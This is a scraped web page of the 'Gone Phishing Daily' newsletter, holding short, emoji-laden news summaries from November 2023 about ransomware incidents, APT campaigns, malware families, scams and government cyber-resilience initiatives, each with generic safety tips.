Gone Phishing Daily

Home
Gone Phishing Daily

The Cyber Security Newsletter thats on the FBIs most wanted, no BS breakdown on the world of cyber se

17/11/2023

🚨 Cybersecurity Alert: Attacks on File-Transfer Services Surge! 📂💻

🔒 In a wave of attacks that started in March, MOVEit, GoAnywhere, and IBM Aspera Faspex faced supply-chain attacks, with Clop ransomware exploiting a zero-day vulnerability in MOVEit and GoAnywhere. The aftermath, ongoing for five months, reveals a disturbing trend of attacks on file-transfer services.

🎯 Why Are They Targeted?

According to Jess Burn, principal analyst at Forrester, these services are an opportunistic attack vector due to the high-value data they handle. Beyond phishing credentials, they contain a "treasure trove" for threat actors—data for extortion or potential corporate espionage.

💼 Who's at Risk?

Major financial institutions, education providers, government agencies, healthcare, insurance, and law firms are among the direct and indirect victims.

🔍 Vulnerability Spotlight:

Intel 471 has identified 17 vulnerabilities in managed file-transfer products since 2018, with 51 classified as high risk. As these tools become more prevalent, the number of vulnerabilities for threat actors to exploit increases.

⚠️ Implicit Trust Issue:

Mauricio Sanchez from Dell'Oro Group warns of a false sense of security, emphasising the significant consequences of third-party handling of corporate data during transfers.

🛡️ Staying Secure:

Be vigilant, update systems regularly, and consider the broader implications of using file-transfer services. 💪🌐

👉 To read more phishy articles, please visit www.gonephishing.xyz - and sign up to our newsletter to never miss a story!

17/11/2023

🛍️ Stay Cyber-Safe this Shopping Season! 🛡️

As the shopping frenzy kicks in, it's not just the joy of discounts that's on the rise—cybercriminals are gearing up too! 💻👾 Beware of credit card skimming, a growing threat lurking in the shadows of online stores.

🚨 The Kritec Campaign Unveiled!

Keep an eye out for the Kritec campaign, a notorious credit card skimming operation we've been tracking since March 2023. 🕵️‍♂️ With hundreds of stores compromised, this threat has resurged in October, just in time for the holiday season. 😱

🛡️ Top Tips

👀 Inspect the Website: If it looks outdated or neglected, steer clear! 🚫

🛡️ Web Protection Tools: Use antivirus products with web protection to spot malicious domains and IPs.

🌐 Stay Updated:

Regularly update your website's CMS and plugins to avoid vulnerabilities.

👩‍💻 Malwarebytes to the Rescue!

For an extra layer of defence, consider Malwarebytes Premium with web protection and the Browser Guard extension for advanced in-browser detection.

Happy shopping, but safer shopping! 🎉🛒

👉 To read more phishy articles, please visit www.gonephishing.xyz - and sign up to our newsletter to never miss a story!

16/11/2023

🚨 Major Cyber Disruption at DP World Australia! 🌏💻

DP World Australia, a global logistics giant handling 40% of Australia's container trade, faced a severe cyberattack on November 10, disrupting freight movements in key ports. 🚢💔

🚨 Def Con 4 🚨

The company, with an annual revenue exceeding $10 billion, activated emergency plans and engaged cybersecurity experts to address the incident. Currently testing systems to resume normal operations, DP World is gradually restoring services.

Approximately 30,000 containers, including time-sensitive goods like blood plasma and premium food items, remained stagnant since the attack. Damage estimates soar into the millions.

🕵️ Internal Affairs 🕵️

While data access and theft are potential concerns, an internal investigation is ongoing, and DP World is collaborating with the Office of the Australian Information Commissioner to assess the impact on personal information.

As of now, no ransomware group has claimed responsibility, and the company has not commented on data theft. Stay tuned for updates on this developing situation. 🔄🔍 🚀

👉 To read more phishy articles, please visit www.gonephishing.xyz - and sign up to our newsletter to never miss a story!

16/11/2023

🔐 Moneris Successfully Thwarts Ransomware Attack!

Great news, folks! Moneris, a tech company backed by Canada's top banks, has successfully fended off a recent ransomware attack! 🛡️💻

🐍 Enter Medusa 🐍

Toronto-based Moneris, a joint venture of the Royal Bank of Canada and Bank of Montreal, reported a cyber intrusion by the Medusa ransomware gang. However, Moneris's cybersecurity team swiftly sprang into action, preventing access to critical data without any ransom demand. 🚫💰

😌 Disaster averted 😌

Despite attempts to breach their networks, Moneris reassures us that their robust security measures were not compromised. The company, which handles transactions at over 325,000 merchant locations across Canada, remains dedicated to safeguarding customer data. 👏

😤 Moneris don’t play 💪

While details about the attack's timing remain undisclosed, Moneris emphasises its commitment to customer protection and swift response to cyber threats. The Medusa gang, notorious for high-profile attacks, targeted Moneris but was met with resilient cybersecurity practices, according to the bank. 🌐🛑

It’s worth noting that Moneris has been asked several times whether they paid the $6 million ransom and has refused to answer on all occasions. 😬

Ransomware gangs are increasingly targeting financial infrastructure globally, with the recent LockBit attack on the Industrial and Commercial Bank of China causing disruptions in the U.S. Treasury market. Let's stay vigilant and cyber-secure, folks! 🌐🔒🚀

👉 To read more phishy articles, please visit www.gonephishing.xyz - and sign up to our newsletter to never miss a story!

15/11/2023

🏥 Hackers Targeting U.S. Healthcare Orgs Using ScreenConnect! 🤯

🔒 Security researchers uncover a concerning trend as threat actors exploit ScreenConnect, a remote access tool, to target healthcare organisations, including Transaction Data Systems (TDS).

🌐 Who's Affected:

TDS, a pharmacy supply chain solution in all 50 states, faces attacks on local ScreenConnect instances. Managed security platform Huntress identifies attacks on two healthcare organisations, indicating ongoing reconnaissance for potential escalation.

⚠️ Attack Details:

Between Oct 28 and Nov 8, 2023, hackers employ consistent tactics, downloading a payload named text.xml. This file loads Metasploit attack payload Meterpreter into system memory, evading detection using non-PowerShell methods.

💻 Compromised Endpoints:

Windows Server 2019 systems of a pharmaceutical and healthcare organisation, both linked by ScreenConnect instances. The tool instals additional payloads, executes commands, transfers files, and attempts to create new user accounts for persistent access.

🔗 Connection to TDS:

ScreenConnect instance tied to 'rs.tdsclinical[.]com' domain, associated with TDS. It's unclear if TDS suffered a breach, had compromised credentials, or faced a different exploit.

🚨 Urgent Action Needed:

Huntress attempts to notify TDS (now 'Outcomes') after a merger last summer go unanswered. Healthcare entities urged to stay vigilant, update security measures, and collaborate to thwart cyber threats. 🤝💊🔒

👉 To read more phishy articles, please visit www.gonephishing.xyz - and sign up to our newsletter to never miss a story!

15/11/2023

🚨 Hackers Run Crypto Scam Using Google Forms! 💰

🔍 Researchers warn of rising crypto spam! Scammers leverage Google Forms' "Release scores" to deliver emails, tricking victims into crypto investments or sharing personal details.

👩‍💻 How it Works:

Spammers exploit Google Forms, using any email to complete quizzes. After submission, they activate "Release scores," sending customised emails from victims' Google accounts, increasing delivery chances.

👀 Sample Scam:

Subject: "Score released: Balance 1.3320 BTC." Clicking redirects to a fake form, prompting email confirmation.

Victims led to an external link, urged to activate accounts with Bitcoins worth $46,000. Live chat assistance makes it convincing. Final step: pay a '0.25%' exchange fee or $64 via QR code.

🎯 Google Features Targeted:

This follows Google's warning of threat actors using its Calendar service for malicious activities. A tool called Google Calendar RAT exploited event descriptions for covert communication.

🛡️ Stay Informed:

As scams evolve, organisations must update on IoCs and block malicious indicators. 🚫 Be cautious, share awareness, and protect yourself from cunning cybercriminals! 🌐

👉 To read more phishy articles, please visit www.gonephishing.xyz - and sign up to our newsletter to never miss a story!

15/11/2023

💔 Heartbreaking Story: 74-Year-Old Linda Bemis Falls Victim to Love Scam 😢

Linda thought she found love online with "Mr Bravo," who claimed to be a military serviceman. As their bond grew, Mr Bravo requested huge sums of money, leading Bemis to sell her home share and car, totaling $60,000! 😱

🕵️‍♂️ Shocking Twist:

Mr Bravo is Lisa Miller! 😱 Miller, claiming innocence, rerouted her IP address to Nigeria. Arrested on fraud and theft charges, she now faces serious penalties. 😡

🏠 Homeless and Heartbroken:

Bemis warns, "Be careful! Before you know it, you can become a victim just like that." 💔

👮‍♂️ Police Caution:

Sergeant Brian Schnell urges vigilance. Scammers are out there—protect yourself and your loved ones! 🛡️

🔗 Stay Informed:

Update as of November 10—Lisa Miller found guilty, awaiting sentencing. Justice prevails! ⚖️

Let's spread awareness and stop scams together! Share this cautionary tale with your friends and family. 🤝

👉 To read more phishy articles, please visit www.gonephishing.xyz - and sign up to our newsletter to never miss a story!

14/11/2023

🌐 Cybersecurity Alert: Iranian-Linked Group Strikes in the Middle East! 🚨

In October 2023, a group tied to Iran intensified cyber attacks on transportation, logistics, and technology sectors in the Middle East, including Israel, amid heightened cyber activity since the Israel-Hamas war onset. 💻

Attributed by CrowdStrike to threat actor Imperial Kitten (aka Crimson Sandstorm, TA456, Tortoiseshell, Yellow Liderc), the attacks, ongoing since 2017, fulfil Iranian strategic intelligence needs linked to IRGC operations. Social engineering, job recruitment-themed content, and custom .NET-based implants characterise their modus operandi.

🎣 Iran’s Gone Phishing 👀

Attack chains utilise compromised Israeli-related websites for profiling visitors using bespoke JavaScript. Tactics include watering hole attacks, one-day exploits, stolen credentials, phishing, and targeting IT service providers. 🌐🎣

Phishing campaigns leverage macro-laced Excel docs to deploy a Python-based reverse shell, while post-exploitation involves lateral movement via tools like PAExec and NetScan.

🐀 I smell a RAT 👀

Remote access trojans (RATs) use Discord for command-and-control, with malware like IMAPLoader persisting as a Windows Service named Keyboard Service.

Microsoft notes Iranian cyber activity post-war as reactive and opportunistic, emphasising propaganda efforts. In parallel, revelations reveal a Hamas-affiliated threat actor, Arid Viper, targeting Arabic speakers with Android spyware SpyC23.

Stay vigilant against evolving cyber threats, folks! 🛡️💻 Until next time ✌

👉 To read more phishy articles, please visit www.gonephishing.xyz - and sign up to our newsletter to never miss a story!

️

14/11/2023

🚀 Sandworm's Cyber Siege on Ukraine! Power Grid Hit in Multi-Event Attack! ⚡

Last year, the notorious Russian hacking group, Sandworm, aimed its digital arsenal at a critical Ukrainian electrical substation, resulting in a significant power outage in October 2022. 💻

Revelations by Google's Mandiant describe the assault as a "multi-event cyber attack," with Sandworm employing innovative techniques to manipulate industrial control systems (ICS). The initial strike used OT-level living-off-the-land (LotL) methods, coinciding with widespread missile strikes on Ukraine's critical infrastructure. 😱💡

🎸 Enter Sandworm 🤘

In a cunning follow-up, Sandworm unleashed chaos by deploying a new variant of CaddyWiper in the victim's IT environment, adding a layer of complexity to the attack. 🌀💥

Crucial details like the location, duration of the blackout, and the number affected remain shrouded in secrecy. Sandworm's disruptive history in Ukraine's power grid traces back to 2015, employing malware such as Industroyer. 🕵️‍♂️🔌

🎶 Let’s get cyber-physical, physical 💀

While the initial vector for the cyber-physical assault remains unclear, the intrusion likely occurred around June 2022. Sandworm infiltrated the operational technology (OT) environment through a hypervisor housing supervisory control and data acquisition (SCADA) management.

On October 10, 2022, an optical disc loaded with malware triggered an unscheduled power outage. ⚡📀

This alarming attack coincided with a series of missile strikes, underscoring Sandworm's immediate threat to Ukrainian critical infrastructure. Mandiant urgently calls on global asset owners utilising MicroSCADA products to fortify defences against Sandworm's evolving tactics. 🛡️🌐

👉 To read more phishy articles, please visit www.gonephishing.xyz - and sign up to our newsletter to never miss a story!

14/11/2023

🚨 Cybersecurity Alert: Sapphire Sleet Unleashes New Tactics! 🚨

🌐 Brace yourselves for a cybersecurity showdown! The notorious Lazarus Group's sub-cluster, Sapphire Sleet, has upped the ante by deploying a fresh strategy.

They've established deceptive skills assessment portals, a clever ploy in their latest social engineering campaigns. This shift in tactics, as identified by Microsoft, demands our attention. 🕵️‍♂️

🦎 Karma, karma, karma, karma, karma chameleon 👀

👾 Operating under aliases such as APT38, BlueNoroff, CageyChameleon, and CryptoCore, Sapphire Sleet specialises in cryptocurrency theft through cunning social engineering tactics. Their track record speaks volumes. 🛡️

🍏 Recent findings by Jamf Threat Labs uncovered a connection between Sapphire Sleet and a new macOS malware named ObjCShellz. This malware acts as a late-stage payload, working hand-in-hand with another macOS threat, RustBucket.

😡 Bloody jobsworths! 🤓

💼 Targeting prominent professional platforms like LinkedIn, Sapphire Sleet baits victims with promises of skills assessment. Microsoft's Threat Intelligence team revealed that successful communications are discreetly moved to other platforms, complicating detection efforts.

🔍 In a bid to outsmart cybersecurity measures, Sapphire Sleet has expanded its network of malicious websites. Recruiters are lured into registering on these sites, which are cunningly password-protected to impede analysis.

🚫 Stay vigilant! Exercise caution with unsolicited communications and dubious skills assessment portals. Keep your cybersecurity shields up, and let's stay one step ahead of Sapphire Sleet! 💻🛡️

👉 To read more phishy articles, please visit www.gonephishing.xyz - and sign up to our newsletter to never miss a story!

12/11/2023

US Government Launches "Shields Ready" Campaign for Cyber Resilience 🛡️

The US government is stepping up its game in the realm of critical infrastructure (CNI) cyber-resilience with the launch of the "Shields Ready" campaign, designed to complement the highly successful "Shields Up" initiative.

🛡️ Shields Up or Shields Ready? 😂

While "Shields Up" aimed to prepare everyone for cyber-attacks, "Shields Ready" has a laser focus on enhancing CNI processes and fortifying systems in anticipation of potential incidents. 🔒

🔑 Key Messages for CNI Providers

Jointly launched by the US Cybersecurity and Infrastructure Security Agency (CISA), the Department of Homeland Security (DHS), and the Federal Emergency Management Agency (FEMA), "Shields Ready" conveys four pivotal messages to CNI providers:

Understand Infrastructure & Dependencies 👷‍♂️: Identify critical operational systems and potential interdependencies with other infrastructure.

Comprehensive Risk Assessments 🚨: Evaluate a broad spectrum of threats that could disrupt CNI and assess specific vulnerabilities.

Make Actionable Plans 📋: Develop strategic risk management plans to reduce risks and vulnerabilities. Create incident response and recovery plans to minimise downtime.

Measure Progress & Improve 📈: Continuously enhance readiness by testing incident response plans under real conditions. Regularly update and evaluate strategic plans.

Jen Easterly, CISA director, stressed the need to equip CNI entities, including hospitals, schools, and water facilities, with the resources necessary to respond to disruptions. This campaign aims to enhance the resilience of the infrastructure that Americans rely on daily. 💪🌐

Preparation today ensures readiness for tomorrow's threats. Stay vigilant and resilient! 🏗️👀🔐 Cheers cyber squad and thanks for reading our 200th edition.

👉 To read more phishy articles, please visit www.gonephishing.xyz - and sign up to our newsletter to never miss a story!

12/11/2023

🦠 Malvertising Alert: Cybercriminals Mimic Windows News Portal to Spread Malware 🦠

A concerning malvertising campaign has emerged, where cybercriminals are imitating a legitimate Windows news portal to disseminate malware. This portal typically attracts software enthusiasts and system administrators seeking computer reviews and software utilities. 🖥️

👀 What's Going On? 👀

Threat actors are capitalising on the Windows news portal's credibility to promote a malicious installer for the widely-used CPU-Z processor tool.

They employ a cloaking technique that redirects victims to a seemingly innocent blog page, which, in reality, leads to a download page housing a digitally signed MSIX installer designed to avoid detection.

When users click the installer, a malicious PowerShell script called FakeBat is triggered, downloading Redline Stealer onto the victim's system.

🌐 A Broader Campaign Unveiled 🌐

Based on their investigation, researchers suspect this incident is part of a larger malvertising campaign targeting other utilities like Notepad++, Citrix, and VNC Viewer. 🕵️

🔮 Recent Trickery Trends 📈

In addition to this, a surge in fake browser update campaigns has been observed, facilitating the spread of Cobalt Strike, loaders, and stealers. These campaigns have tricked users into unknowingly downloading malware onto their systems through visual deception and watering hole techniques. 🌊

🕵️ Stay Vigilant 🔎

Impersonating popular software remains a favoured tactic of cybercriminals. To stay safe, organisations can verify software files using SHA256 hash sums from the vendor's website and keep an eye on Indicators of Compromise (IoCs), including malicious domains and payload URLs, to understand attack patterns. 🛡️💡

Vigilance and cautiousness remain key in the ongoing battle against cyber threats. Stay informed and stay secure!🔒👀🔍

👉🔗 To read more phishy articles, please visit www.gonephishing.xyz and sign up to our newsletter to never miss a story!

12/11/2023

Defending ChatGPT: OpenAI Fights DDoS Attacks 🛡️

OpenAI, the developer behind ChatGPT, recently faced a relentless storm of distributed denial of service (DDoS) attacks, causing intermittent outages. Here's the scoop on what happened and why it matters. 🚀

🔌 Attack Alert: ChatGPT in Peril 🚨

On November 8, ChatGPT and its API experienced "periodic outages" due to an abnormal traffic pattern, indicative of a DDoS onslaught. OpenAI worked tirelessly to mitigate the situation and get ChatGPT back on track. 📆

🤖 Hacktivist Havoc 🌐

Anonymous Sudan, a hacktivist group, declared itself the culprit behind these DDoS attacks. Their motives? Allegations of OpenAI's support for Israel and concerns about ChatGPT's potential role in oppressive actions. 🌍

🚀 AI in Conflict and Espionage 🌐

Anonymous Sudan raised questions about AI's use in weaponry and intelligence, emphasising the impact on global conflicts. 🌐

🔐 Strengthening Cyber Defences 🛡️

Security experts advise continuous enhancement of DDoS mitigation services to adapt to the evolving tactics of threat actors. OpenAI remains a notable target for cyberattacks due to its prominence in the tech industry. 🚀

In a world filled with uncertainties, safeguarding network integrity remains paramount. Stay tuned for updates as OpenAI's battle against DDoS attacks unfolds. 🔒🌐😮

👉 To read more phishy articles, please visit www.gonephishing.xyz - and sign up to our newsletter to never miss a story!

11/11/2023

🛡️ New Malware Linked to BlueNoroff APT Group Uncovered 🚀

🕵️‍♂️ Security researchers have unearthed a fresh malware variant believed to be associated with the financially motivated BlueNoroff Advanced Persistent Threat (APT) group. BlueNoroff often targets cryptocurrency exchanges, venture capital firms, and banks in its campaigns.

👾 Threat Hunting 🏹👾🌲

🔎 Discovered during routine threat hunting, the malware, named "ObjCShellz," stands out due to its interaction with a known malicious domain. What's concerning is that a legitimate cryptocurrency exchange also operates under a similar domain, raising red flags.

🚗 Rustbucket returns 🚗

👥 BlueNoroff's Rustbucket campaign involves disguising as investors or headhunters to infiltrate targets, aligning with the latest discovery. The malware executes remote shell commands, providing attackers with control over compromised systems.

🎭 Online again off again 🎭

📅 The malicious domain, registered in May 2023, eventually went offline after analysis. While the initial access method remains unclear, the malware likely serves as a late-stage tool in multi-stage attacks.

Stay vigilant as cybersecurity researchers continue to uncover threats from this APT group. 🔒🦠

👉 To read more phishy articles, please visit www.gonephishing.xyz - and sign up to our newsletter to never miss a story!

11/11/2023

🚀 Visa Launches Cybersecurity Training Program 🎓

Visa has unveiled a payments learning program to address the growing need for skilled cybersecurity professionals.

The program will offer online courses and certifications to equip workers, students, and military personnel with vital cybersecurity skills, aiming to create a diverse talent pool.

Initially focused on payment cybersecurity, Visa's move aligns with the White House National Cybersecurity Strategy Implementation Plan's call to foster cybersecurity careers...

👉 To continue reading, please visit www.gonephishing.xyz and sign up to our newsletter to never miss a story!

11/11/2023

👾 Meet Farnetwork: The Ransomware Prodigy! 👾

🔍 In the latest scoop from the cybersecurity world, researchers have unveiled a notorious threat actor known as Farnetwork. This cybercriminal has been making waves for the past four years, playing a key role in five different ransomware-as-a-service (RaaS) programs. 😱

🕵️‍♂️ Getting to Know the Villain 🕵️‍♂️

Singapore-based Group-IB managed to peek behind the curtains of the Nokoyawa ransomware-based RaaS.

They even had a "job interview" with Farnetwork! This sneak peek uncovered Farnetwork's dark history, which began in 2019.

They dabbled in various ransomware projects like JSWORM, Nefilim, Karma, Nemty, and eventually launched their own RaaS program using Nokoyawa ransomware. 😈

💼 Cybercriminal history 💼

Farnetwork doesn't just have one name; they go by many aliases like Farnetworkit, Jingo, and more on underground forums. They initially offered a remote access trojan called RazvRAT.

🌐 Broadening Horizons 🌐

In 2022, Farnetwork shifted their focus to Nokoyawa and even created a botnet service for their affiliates to access compromised corporate networks. They've been recruiting talent to deploy ransomware and demand ransom from victims using stolen credentials.

💸 The RaaS Game 💸

RaaS affiliates get 65% of the ransom, while Farnetwork gets 20%, and the ransomware developer gets 15%. This innovative approach streamlines the ransomware operation but reduces affiliates' payouts.

👀 What's Next? 👀

Although Nokoyawa ceased operations in October 2023, don't be surprised if Farnetwork reemerges under a different name and with a new RaaS program. According to experts, Farnetwork is one of the most active players in the RaaS market.

Stay vigilant, stay safe, and watch out for the next cyber thriller! 🛡️👀🌐

👉 To read more phishy articles, please visit www.gonephishing.xyz - and sign up to our newsletter to never miss a story!

10/11/2023

🚨 Data Breach Alert: 5 Canadian Hospitals Hit by Ransomware 🏥

😱 In a major security breach, patient and employee data from five Canadian hospitals have been stolen and leaked online due to a ransomware attack.

🏨 Hospitals Impacted:

Bluewater Health

Chatham-Kent Health Alliance

Erie Shores HealthCare

Hôtel-Dieu Grace Healthcare

Windsor Regional Hospital

Plus, service provider TransForm Shared Service Organization

📂 Shared Drive Compromised...

👉 To continue reading, please visit www.gonephishing.xyz and sign up to our newsletter to never miss a story!

10/11/2023

🚨 North Korea's BlueNoroff Unleashes macOS Malware: ObjCShellz Strikes 🖥️💣

The notorious BlueNoroff, also known as APT38 and more, linked to North Korea, is behind a new macOS malware named ObjCShellz.

🧐 What You Need to Know:

Part of the RustBucket malware campaign 💼

Likely delivered via social engineering 🤯

Used in multi-stage attacks 💥

🕵️‍♀️ How It Works:

ObjCShellz, written in Objective-C, is a remote shell for executing commands from an attacker's server. 🐚

🎯 Potential Targets:

It's suspected that this malware targets companies in the cryptocurrency industry or those closely related. ₿

🚀 Cyber Threats Evolve:

North Korea-sponsored groups like Lazarus, to which BlueNoroff is linked, are constantly evolving and sharing tactics and tools. 🌐

🚫 Stay Vigilant:

While it's a simple malware, it's highly functional. Keep your cybersecurity tools updated! 💪

Watch out for more macOS malware campaigns as these threat actors adapt and expand their reach. 🌟 🚫🦠

👉 To read more phishy articles, please visit www.gonephishing.xyz - and sign up to our newsletter to never miss a story!

10/11/2023

🚨 New Jupyter Infostealer Malware Resurfaces with Tricky Tactics 🦠

The Jupyter Infostealer, also known as Polazert, SolarMarker, and Yellow Cockatoo, is back with sneaky "simple yet impactful changes." 💻 Researchers from VMware Carbon Black uncovered this dangerous malware's latest tactics.

🌐 Initial Access: Jupyter tricks users with manipulated SEO tactics and malvertising to download it from dubious websites. 🌐

🔍 What Does It Do?

Harvests Credentials 🤖

Establishes Encrypted Command-and-Control Communication 🔒

Executes Arbitrary Commands ⚙️

📜 Latest Updates:

The malware now uses certificates to make itself appear legitimate, but it's a disguise! Fake installers launch the infection chain, connecting to a remote server using PowerShell. 😱

🌌 Evolving Threats:

Other malware, like Lumma Stealer and Mystic Stealer, have been updated to include loaders for more devious attacks, including ransomware. 😈

🔄 Constant Evolution:

Jupyter Infostealer has updated its network communication and gained popularity among cybercriminals. It now distributes other malware like RedLine, DarkGate, and GCleaner using its loader functionality. 📈

👾 More Malware:

Keep an eye out for Akira Stealer and Millenium RAT, equipped with various features for data theft. The world of cyber threats is constantly changing! 🌎

🤖 Proxy Botnet Alert:

PrivateLoader and Amadey malware have infected thousands of devices with a proxy botnet called Socks5Systemz. 🧦 This botnet turns infected machines into proxies for anonymity. 💰

🌐 Where Are the Threat Actors?

The actors behind these attacks may be of Russian origin, given the lack of infections in the country. 🐻‍❄️

Stay safe online! 💪 Update your security tools and stay vigilant. 💡

👉 To read more phishy articles, please visit www.gonephishing.xyz - and sign up to our newsletter to never miss a story!

09/11/2023

🚨 U.S. Treasury Sanctions Russian Woman for Money Laundering 🚨

The U.S. Department of the Treasury has taken action against Ekaterina Zhdanova, a Russian individual, for her involvement in laundering virtual currency for Russia's elites and cybercriminal groups, including the notorious Ryuk ransomware gang. 💰

🌐 Zhdanova is accused of facilitating large cross-border transactions to help Russian individuals access Western financial markets and evade international sanctions. She utilises entities lacking Anti-Money Laundering/Combating the Financing of Terrorism (AML/CFT) controls, like the OFAC-designated Russian crypto exchange Garantex Europe OU (Garantex). 💼

💸 To move funds internationally, Zhdanova employs various methods, including cash and connections to international money laundering associates and organisations. It's worth noting that Garantex was previously sanctioned in April 2022, alongside the takedown of the dark web marketplace Hydra. 🔒

🕵️ She's also accused of assisting the Ryuk ransomware group by laundering over $2.3 million of suspected victim payments in 2021. Ryuk, a precursor to Conti ransomware, has targeted governments, healthcare, and more since 2018.

👮‍♂️ In a related case, a Russian citizen named Denis Mihaqlovic Dubnikov pleaded guilty to money laundering charges connected to Ryuk ransomware attacks earlier this year.

💼 As ransomware attacks continue to rise, organisations are urged to adopt comprehensive defence strategies, including robust backups, security software, user training, and proactive incident response plans. 🛡️🌐💸🔐

Don’t get caught with your pants down folks; ransomware is the cyber-scourge of our time. Stay safe out there, true believers ✊

👉 To read more phishy articles, please visit www.gonephishing.xyz - and sign up to our newsletter to never miss a story!

Address

Website

https://www.gonephishing.xyz/

Alerts

Be the first to know and let us send you an email when Gone Phishing Daily posts news and promotions. Your email address will not be used for any other purpose, and you can unsubscribe at any time.

Shortcuts

Address
Alerts
Claim ownership or report listing
Want your business to be the top-listed Media Company?

Country:

City: